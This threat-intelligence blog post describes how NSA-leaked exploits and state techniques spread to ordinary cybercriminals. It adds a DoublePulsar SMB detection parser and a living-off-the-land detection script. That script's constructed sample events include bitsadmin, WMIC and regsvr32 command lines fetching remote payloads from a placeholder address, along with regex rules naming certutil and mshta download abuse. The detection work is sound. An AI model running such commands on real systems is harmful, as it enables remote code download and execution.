Trickle-Treat: How Threat Actors Benefit From the Trickle-Down of Capabilities
As in many walks of life, cyber threat actors learn from the best. This means that the toolsets nation states and elite cybercriminals use to compromise high-profile victims are increasingly being dispersed and then used by an army of low-level criminal threat actors, who are much less selective in their targeting. The impact of this trickle-down effect in cyber capabilities is serious for the majority of companies, who now face a high volume of sophisticated attacks, often with basic objectives such as ransomware and cryptocurrency mining.
On 7 May, a new ransomware variant dubbed RobbinHood hit local government offices in the US city of Baltimore. Later that month, the New York Times published claims, disputed by the NSA, that RobbinHood used EternalBlue, an exploit for a flaw in the SMBv1 (Server Message Block) protocol that lets malware spread laterally across a network of unpatched Windows hosts. EternalBlue was developed by the US National Security Agency (NSA) and was leaked in April 2017 by a group known as The Shadow Brokers as part of a wider cache of tools. The history of the exploit, from nation-state operations to standard malware campaigns, therefore illustrates the way that TTPs (tactics, techniques and procedures) and tools typically filter down from more sophisticated threat actors to those that are less capable.
Although the debate regarding this potential application of EternalBlue continues, there are many other recent examples of the exploit's use in mundane cybercriminal activities, and even evidence that its popularity may still be rising.[1] In April, for example, we reported on its use in a cryptocurrency mining campaign. The broader cybercriminal interest in EternalBlue is further illustrated in the screenshot below, taken from a Russian-language deep web forum, in which the poster explains how fellow users can run the Metasploit modules for EternalBlue and DoublePulsar.
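Because the leaked DoublePulsar implant is now so widely deployed by criminals, a practitioner's first question is how to find it on their own network. The following is an added example, not code from the original post: it decodes the SMB1 response to the public DoublePulsar probe, the same check used by the nmap smb-double-pulsar-backdoor script and Metasploit's ms17_010 scanner, where an implanted host answers a Trans2 SESSION_SETUP request with Multiplex ID 0x51 instead of the 0x41 a clean host returns. Sending the probe over the network is outside this snippet; the responses it parses are constructed by hand to exercise the parser, and the flag values in them are illustrative.

```python
"""Classify an SMB1 Trans2 response as clean or DoublePulsar-implanted.

Added example, not code from the original post. Detection logic: after a
Trans2 SESSION_SETUP probe, a DoublePulsar-implanted host replies with
Multiplex ID (MID) 0x51; a clean host replies with 0x41. The sample
responses built below are constructed, not captured from a real host.
"""
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
# 32-byte SMB1 header (MS-CIFS 2.2.3.1), little-endian fields.
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
MID_CLEAN = 0x41
MID_DOUBLEPULSAR = 0x51


def parse_smb1(packet: bytes) -> dict:
    """Strip the 4-byte NetBIOS session header and decode the SMB1 header.

    Raises ValueError for anything that is not a well-formed SMB1 message, so
    a scanner can tell 'not SMB1 at all' apart from 'clean'.
    """
    if len(packet) < 4 + SMB_HEADER.size:
        raise ValueError("packet too short for NetBIOS + SMB1 header")
    nb_type, nb_len = packet[0], int.from_bytes(packet[1:4], "big")
    if nb_type != 0x00 or nb_len != len(packet) - 4:
        raise ValueError("bad NetBIOS session header")
    (magic, command, status, flags, flags2, pid_high, signature,
     _reserved, tid, pid_low, uid, mid) = SMB_HEADER.unpack_from(packet, 4)
    if magic != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    return {"command": command, "status": status, "flags": flags,
            "flags2": flags2, "signature": signature, "tid": tid,
            "pid": (pid_high << 16) | pid_low, "uid": uid, "mid": mid}


def classify_trans2_response(packet: bytes) -> str:
    """Return 'doublepulsar', 'clean' or 'unknown' for the probe's response."""
    hdr = parse_smb1(packet)
    if hdr["command"] != SMB_COM_TRANSACTION2:
        return "unknown"  # reply to some other command; the probe was not Trans2
    if hdr["mid"] == MID_DOUBLEPULSAR:
        return "doublepulsar"
    if hdr["mid"] == MID_CLEAN:
        return "clean"
    return "unknown"


def build_sample_response(mid: int, command: int = SMB_COM_TRANSACTION2) -> bytes:
    """Constructed Trans2 response (WordCount=0, ByteCount=0); not a capture."""
    body = SMB_HEADER.pack(SMB_MAGIC, command, 0, 0x98, 0xC807, 0, b"\x00" * 8,
                           0, 0, 0xFEFF, 0, mid) + b"\x00\x00\x00"
    return b"\x00" + len(body).to_bytes(3, "big") + body


if __name__ == "__main__":
    for label, mid in (("clean host", MID_CLEAN), ("implanted host", MID_DOUBLEPULSAR)):
        print(label, "->", classify_trans2_response(build_sample_response(mid)))
```

The parser deliberately refuses malformed input rather than reporting "clean": a scanner that swallows a truncated or non-SMB reply as a negative result will quietly miss hosts that drop the probe. A positive result should be confirmed by isolating the host and examining it, since the implant lives only in memory and does not survive a reboot.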
The trickle-down of TTPs is not restricted to a flow from nation-state to cybercriminal, however. Capabilities also filter between state actors of varying sophistication. EternalBlue, for example, is best known for its use in North Korea's May 2017 WannaCry ransomware attacks, which cost the NHS an estimated £92 million.
Nor is EternalBlue the only illustration of this trickle-down effect. DoublePulsar, for instance, was another NSA tool published in The Shadow Brokers' cache. Yet this May, reporting emerged suggesting that a threat actor working on behalf of the Chinese state was using it at least a year before it publicly leaked.[2]
Although this Chinese state group may have been provided with the implant by a third party, a more likely explanation is that it reverse engineered the tool after itself being targeted with it. While China deservedly earns its reputation as a top-tier actor in terms of its offensive cyber capabilities, it is not quite on the same level as the likes of the US or Israel. Chinese use of its own version of DoublePulsar therefore represents a further example of this trickle-down of capabilities.
Another good example of advanced exploits originally developed and used by sophisticated nation states being deployed in large-scale criminal operations is the increasing use of kernel-mode memory corruption exploits by financially motivated criminals. Kernel-mode exploitation and DLL side-loading, both traditionally hallmarks of advanced nation-state activity, are now becoming commonplace in ordinary cybercriminal campaigns. PowerGhost, for instance, is a cryptocurrency miner that exploits CVE-2018-8120, a privilege-escalation vulnerability in the Win32k kernel-mode driver. Gh0st RAT, meanwhile, is an example of malware that uses DLL side-loading, in which a trusted, often signed, executable is made to load a malicious DLL that has been placed where the executable searches for one by name. Although Gh0st RAT was previously associated with Chinese state activity, its source code is now public, enabling less capable actors to use it in their own operations.
The image below shows a criminal on a Russian-language forum selling access to a kernel-mode memory exploit for CVE-2018-8120. Such an exploit enables an attack that is sophisticated, difficult to defend against and, once successful, very hard to remediate, since code running in the kernel can disable or deceive the security tooling that is supposed to detect it. The use of such attack methods for relatively mundane criminal enterprises makes them a serious issue for most companies.
The threat from criminals using kernel-mode memory exploits to deploy ransomware is exemplified by GandCrab. In September last year, we identified that the developer of GandCrab, a ransomware-as-a-service (RaaS) offering sold on cybercriminal forums, had released the latest version of their tool. Version 5 contained a few small changes and also included an exploit for the aforementioned CVE-2018-8120, which allows an attacker to escalate privileges locally, as GandCrab's developer mentions in dark web forum posts (see below).
As we detail in the rest of this blog, the trickle-down of capabilities can range from precise tactical imitation, involving the reuse of particular tools and exploits, to broader targeting of specific vulnerabilities, to, in the broadest sense, imitating general techniques. Capabilities, as we have alluded to, can also filter between various types of threat actors: from state to state, from states to cybercriminals or from criminals to other, less sophisticated criminals.
Two Streams: How capabilities trickle down via tools and vulnerabilities
As demonstrated by the examples of EternalBlue and DoublePulsar, capabilities, in the narrowest of senses, can filter down in the form of specific tools and exploits. This was further illustrated in January, when reporting emerged suggesting that former NSA contractors working on behalf of the UAE were using Karma, an NSA-developed spyware variant. Many less sophisticated nation states seek to purchase their capabilities from commercial spyware providers, such as the NSO Group, rather than develop their own. Karma, however, is a rarer instance of a government seemingly obtaining its capabilities from another state.
Capabilities can also trickle down in the form of vulnerabilities rather than finished tools. While a tool such as EternalBlue weaponises one vulnerability in one particular way, knowledge of the vulnerability itself can be turned into whatever exploit an actor is able to build or buy. Typically a nation-state or a sophisticated cybercriminal group will be the first to target a vulnerability, shortly after it is publicly disclosed or, in rarer cases, as a zero-day for which no patch yet exists. Once a proof-of-concept exploit is publicly available, ordinary cybercriminals begin exploiting the vulnerability in their own operations.
An example of this is CVE-2018-0802, a vulnerability in Microsoft Office's Equation Editor which, in early 2018, was being exploited in North Korean state operations. After disclosure of this operation, and the subsequent emergence of proof-of-concept exploit code on GitHub (see above), the CVE was, by July 2018, among the exploits included in ThreadKit, a cybercriminal service for automatically generating exploit-laden Office documents. As the post below shows, ThreadKit is offered on a Russian-language cybercriminal forum, with its seller emphasising its custom functionality and the process by which it operates.
CVE-2019-0604, a remote code execution vulnerability in Microsoft SharePoint, may yet follow a similar path. Sophisticated cybercriminal groups such as FIN7 appear to be targeting this vulnerability at present, suggesting that once exploit code is publicly available, less capable threat actors may attempt to adopt it in their own operations.
The Trickle Becomes a Downpour: how broader techniques can even become accessible for unsophisticated adversaries
In the broadest of senses, capabilities can also filter down in the form of wider techniques, not tied to particular tools or vulnerabilities. Here is the greatest potential for trickle-down: while ordinary cybercriminals may lack the sophistication to leverage specific exploits or malware variants, broader techniques are typically less restrictive in their technical demands.
This is true of supply chain compromises, in which an organisation is compromised via a trusted supplier or third party. While traditionally associated with sophisticated state actors such as China, which often uses the technique to infiltrate hardened targets in the technology sector, ordinary cybercriminals are increasingly using it in their own campaigns, as indicated in the graph below, which shows the growing number of reports in our database in which supply chain compromise has been flagged as an infection vector.
In February, for example, pro-Palestinian cyber activists compromised a web accessibility plugin to simultaneously infect hundreds of Israeli websites. That supply chain compromise does not require significant technical sophistication was illustrated by the perpetrators' shortcomings: they intended to infect visitors with ransomware but instead merely presented them with defaced webpages.
Another broader technique filtering down is "living off the land": the misuse of native applications and processes already present on a victim's system. In an atmosphere of increased political fallout following attribution, including public indictments, nation-state actors are increasingly using this technique to avoid detection and identification. Yet cybercriminals, likely seeing how the technique aids evasion and saves the cost of developing or purchasing malware, are following suit. The Astaroth trojan, for example, as we reported in February, abuses legitimate Windows features such as WMI (Windows Management Instrumentation) and BITSAdmin. Because these binaries are signed by Microsoft and routinely run by administrators, their execution alone is rarely blocked; detection has to look at the command line and at which process launched them.
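The point about command lines and parent processes can be made concrete. The following is an added example written for this edit, not code from the original post or from any Astaroth analysis: it runs a handful of living-off-the-land rules over constructed process-creation events shaped like Sysmon Event ID 1 records reduced to Image, CommandLine and ParentImage. The BITSAdmin and WMIC rules reflect the two features the page attributes to Astaroth, but the specific command-line patterns, the additional certutil, regsvr32 and mshta rules, the suspicious-parent list and the sample events are all assumptions of this example.

```python
"""Flag living-off-the-land activity in process-creation events.

Added example, not code from the original post. Events are assumed to be
Sysmon Event ID 1 records reduced to Image, CommandLine and ParentImage;
every event below is constructed, not captured. The rule patterns and the
list of suspicious parent processes are assumptions, not a complete catalogue.
"""
import re
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class Rule:
    name: str
    image: str            # lower-case basename of the executable
    pattern: re.Pattern   # searched in the command line


RULES = (
    Rule("bitsadmin download", "bitsadmin.exe", re.compile(r"/(transfer|addfile)\b", re.I)),
    Rule("wmic xsl script execution", "wmic.exe",
         re.compile(r'/format:\s*"?(https?://|[^\s"]+\.xsl)', re.I)),
    Rule("wmic process create", "wmic.exe", re.compile(r"\bprocess\s+call\s+create\b", re.I)),
    Rule("certutil download or decode", "certutil.exe", re.compile(r"-(urlcache|decode)\b", re.I)),
    Rule("regsvr32 scriptlet", "regsvr32.exe", re.compile(r"scrobj\.dll|/i:\s*https?://", re.I)),
    Rule("mshta remote or inline script", "mshta.exe", re.compile(r"https?://|(java|vb)script:", re.I)),
)

# Parents that should not normally spawn admin tools; used to raise severity.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    """Lower-case file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the names of every rule the event matches (empty if benign)."""
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    return [r.name for r in RULES if r.image == image and r.pattern.search(cmd)]


def severity(event: dict, matched: list) -> str:
    """'high' when a matched tool was launched by an Office app or script host."""
    if not matched:
        return "none"
    parent = basename(event.get("ParentImage", ""))
    return "high" if parent in SUSPICIOUS_PARENTS else "medium"


def scan(events: Iterable[dict]) -> list:
    """Return (event id, rule name, severity) for each rule each event matches."""
    hits = []
    for ev in events:
        matched = evaluate(ev)
        for name in matched:
            hits.append((ev["id"], name, severity(ev, matched)))
    return hits


# Constructed events: 1-3 and 6 mimic an abuse chain, 4-5 are routine admin use.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority high http://203.0.113.5/r1.png C:\Users\Public\r1.png",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"id": 2, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /format:"http://203.0.113.5/v.xsl"',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"id": 3, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://203.0.113.5/p.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"id": 4, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /list /allusers",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"id": 5, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic computersystem get model,manufacturer",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"id": 6, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:srv01 process call create "cmd /c whoami"',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Events 4 and 5 use the same binaries as the flagged ones and produce no alert, which is the practical reason rules key on arguments rather than on the image name alone: blocking or alerting on every bitsadmin.exe or wmic.exe launch would drown a SOC in administrator activity. The parent-process check is a cheap way to separate a macro or script dropping a downloader from a help-desk engineer running the same tool by hand.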
Conclusion: Locating the Leak at its Source
The trickle-down of TTPs, at all levels, serves to blur the distinction between nation-state and cybercriminal actors, when both are using the same tools, vulnerabilities and techniques. Furthermore, this process illustrates the importance of detecting and analysing new TTPs as they emerge.
While a technique or an exploit may initially seem niche, deployed in a limited fashion against select targets, it can eventually, as we have argued, filter down into the hands of ordinary cybercriminals, thereby becoming a much broader threat to a wider range of companies and organisations. Awareness of these developments can therefore help to pre-empt tomorrow's threats.